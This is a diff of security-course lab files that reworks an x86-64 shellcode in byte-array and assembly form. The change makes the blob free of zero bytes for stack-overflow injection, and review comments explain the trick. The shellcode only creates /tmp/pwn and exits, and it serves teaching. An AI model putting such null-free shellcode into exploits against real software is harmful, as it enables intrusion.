diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
index a06e163..d595983 100644
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/exploit.c
@@ -2,7 +2,7 @@
 #include
 unsigned char exploit[1024] = {
-0xeb,0x24,0x48,0x31,0xff,0x5f,0x68,0xb6,0x01,0x00,0x00,0x48,0x31,0xf6,0x5e,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd7,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e,0x00
+0xeb,0x2b,0x48,0x31,0xff,0x5f,0x68,0x4b,0xfe,0xff,0xff,0x48,0x31,0xf6,0x5e,0x48,0xf7,0xde,0x48,0x83,0xc6,0x01,0x6a,0x55,0x58,0x0f,0x05,0x48,0x31,0xc0,0x48,0x31,0xff,0x6a,0x2a,0x5f,0x6a,0x3d,0x58,0x48,0x8d,0x40,0xff,0x0f,0x05,0xe8,0xd0,0xff,0xff,0xff,0x2f,0x74,0x6d,0x70,0x2f,0x70,0x77,0x6e
 };
 int main(void) {
diff --git a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
index 1c771d2..aa0e44b 100644
--- a/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
+++ b/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S
@@ -3,14 +3,15 @@ _start:
 jmp indirect
-
+
 p:
-xorq %rdi, %rdi
+xor %rdi, %rdi
 pop %rdi
-#shr $0x8, %rdi
-push $0x1b6
+push $0xfffffffffffffe4b
 xor %rsi, %rsi
 pop %rsi
+neg %rsi
+add $1, %rsi
 push $85
 pop %rax
 syscall
@@ -26,4 +27,4 @@ p:
 indirect:
 call p
-.asciz "/tmp/pwn"
+.ascii "/tmp/pwn"
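Review bot: The new `exploit[]` contents end at `0x6e` with no trailing `0x00`, so the `/tmp/pwn` bytes are now terminated only by the zero-initialised remainder of the 1024-element array rather than by a byte the blob itself carries; the same terminator is removed at the source by the `.asciz` → `.ascii` change in the last shellcode.S hunk, and neither hunk records this dependency. The array is also a hand-pasted byte string with no indication of how it was produced or when it must be regenerated, which is the kind of thing the next reader of this course material cannot reconstruct from the file. Add a comment above the definition, e.g. `/* Keep in sync with shellcode.S (same directory). The blob carries no trailing 0: the path string is terminated by the zero-filled tail of exploit[], so the array must stay larger than the blob. */`. `int main` begins on the hunk's last line and continues outside it.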
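Review bot: The immediate in `push $0xfffffffffffffe4b` is opaque: together with the `neg %rsi` / `add $1, %rsi` added a few lines below it yields 0x1b6, exactly the value the removed `push $0x1b6` loaded directly, but nothing in the file says so and a later edit could easily break the arithmetic or reintroduce the direct form. The apparent reason for the detour is that the new encoding contains no zero bytes (compare the removed `0xb6,0x01,0x00,0x00` with the added `0x4b,0xfe,0xff,0xff` in exploit.c); if that is the intent it should be stated, since it is an invariant of the whole blob and not visible from this one instruction. Suggested comment on the push line: `# -(0x1b6 - 1); neg + add 1 below reconstruct 0x1b6 (== 0666) so the encoded immediate holds no zero byte — see exploit.c`. The `p:` routine continues past `syscall` outside this hunk.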